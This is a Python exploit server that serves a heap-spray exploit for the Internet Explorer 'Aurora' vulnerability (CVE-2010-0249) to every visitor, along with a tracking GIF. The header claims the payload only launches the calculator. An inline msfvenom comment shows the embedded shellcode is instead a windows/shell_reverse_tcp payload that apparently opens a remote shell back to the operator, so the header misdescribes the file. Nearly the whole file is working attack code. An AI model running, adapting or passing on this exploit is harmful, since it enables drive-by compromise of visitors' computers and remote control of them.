ie_aurora.py

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   This program acts as a web server that generates an exploit to 
#   target a vulnerability (CVE-2010-0249) in Internet Explorer. 
#   The exploit was tested using Internet Explorer 6 on Windows XP SP2. 
#   The exploit's payload spawns the calculator. 
#
#   Usage  : python ie_aurora.py [port number]
#   
 
import sys
import socket

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
        
class RequestHandler(BaseHTTPRequestHandler):

    def convert_to_utf16(self, payload):
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload
                
    def get_payload(self):
  # msfvenom -p windows/shell_reverse_tcp LHOST=[IP]LPORT=4443 EXITFUNC=process -b "\x00" -f js_le    
	payload = "%u95bf%u73e2%udbc3%ud9cf%u2474%u5ef4%uc931%u52b1%uee83%u31fc%u0e7e%ueb03%u91ec%uef36%ud719%u0fb9%ub8da%uea30%uf8eb%u7f27%uc95b%u2d2c%ua250%uc561%uc6e3%ueaad%u6c44%uc588%udd55%u44e8%u1cd6%ua63d%ueee7%ua730%u1220%uf5b8%u58f9%ue96f%u158e%u82ac%ub8dd%u77b4%ubb95%u2695%ue5ad%uc935%u9e62%ud17f%u9b67%u6a36%u5753%ubac9%u98ad%u8366%u6b01%uc476%u94a6%u3c0d%u29d5%ufb16%uf5a7%u1f93%u7d0f%ufb03%u52b1%u88d2%u1fbe%ud690%u9ea2%u6d75%u2bde%ua178%u6f56%u655f%u2b32%u3cfe%u9a9e%u5eff%u4241%u155a%u976c%u74d7%u54f9%u86da%uf2f9%uf56d%u5dcb%u91c6%u1567%u66c0%u0c87%uf8b4%uaf76%ud1c5%ufbbc%u4995%u8414%u897d%u5199%ud9d1%u0a35%u8992%ufaf5%uc37a%u25f9%uec9a%u4dd3%u1731%u7bb4%u17cd%u1474%u17d3%ubf65%uf15a%u2fef%uaa0b%ud687%u2016%u1639%u4d8d%u9c79%ub222%u5534%ua04e%u95a1%u9a05%ua964%ub2b3%u38eb%u4258%u2165%u15f7%u9722%uf30e%u8ede%ue1b8%u5622%ua182%uabf8%u280d%u908c%u3a29%u1848%u6e76%u4f04%ud820%u39e2%ub282%u96bc%u524c%ud538%u244e%u3045%uc839%uedf4%uf77c%u7a39%u8089%u1a27%u5b76%u2aec%uc13d%ua345%u9098%uaed7%u4f1a%ud71b%u6598%u2ce4%u0c80%u69e1%ufd06%ue29b%u01e3%u020f%u4126"

	return payload
    
    def get_exploit(self):
        exploit = '''
        <html>
        <head>
            <script>
            
            var obj, event_obj;
            
            function spray_heap()
            {
                var chunk_size, payload, nopsled;
            
                chunk_size = 0x80000;
                payload = unescape("<PAYLOAD>");
                nopsled = unescape("<NOP>");
                while (nopsled.length < chunk_size)
                    nopsled += nopsled;
                nopsled_len = chunk_size - (payload.length + 20);        
                nopsled = nopsled.substring(0, nopsled_len);
                heap_chunks = new Array();
                for (var i = 0 ; i < 200 ; i++)
                    heap_chunks[i] = nopsled + payload;
            }
        
            function initialize()
            {
                obj = new Array();
                event_obj = null;
                for (var i = 0; i < 200 ; i++ )
                    obj[i] = document.createElement("COMMENT");
            }
        
            function ev1(evt)
            {
                event_obj = document.createEventObject(evt);
                document.getElementById("sp1").innerHTML = "";
                window.setInterval(ev2, 1);
            }
      
            function ev2()
            {
                var data, tmp;
                
                data = "";
                tmp = unescape("%u0a0a%u0a0a");
                for (var i = 0 ; i < 4 ; i++)
                    data += tmp;
                for (i = 0 ; i < obj.length ; i++ ) {
                    obj[i].data = data;
                }
                event_obj.srcElement;
            }
                    
            function check()
            
		{
                document.write(navigator.userAgent);
                return true;   
            }
            
            if (check()) {
                initialize();
                spray_heap();               
            }
            else
                window.location = 'about:blank'
                
            </script>
        </head>
        <body>
		<h2> Hello </h2>
            <span id="sp1">
            <img src="aurora.gif" onload="ev1(event)">
            </span>        
        </body>
        </html>
        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
        return exploit 

    def get_image(self):
        content  = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
        content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
        content += '\x01\x00\x3b'
        return content

    def log_request(self, *args, **kwargs):
        pass
        
    def do_GET(self):
        try:
            if self.path == '/':
                print
                print '[-] Incoming connection from %s' % self.client_address[0]
                self.send_response(200) 
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                print '[-] Sending exploit to %s ...' % self.client_address[0]
		self.wfile.write(self.get_exploit())
                print '[-] Exploit sent to %s' % self.client_address[0]
            elif self.path == '/aurora.gif':      
                self.send_response(200)
                self.send_header('Content-Type', 'image/gif')
                self.end_headers()
                self.wfile.write(self.get_image())
        except: 
            print '[*] Error : an error has occured while serving the HTTP request'
            print '[-] Exiting ...'
            sys.exit(-1)
            
                       
def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
        sys.exit(0)
    try:
        port = int(sys.argv[1])
        if port < 1024 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except:
                print '[-] Exiting ...' 
        except socket.error:
            print '[*] Error : a socket error has occurred'
        sys.exit(-1)    
    except ValueError:
        print '[*] Error : an invalid port number was given'
        sys.exit(-1)
            
if __name__ == '__main__':
    main()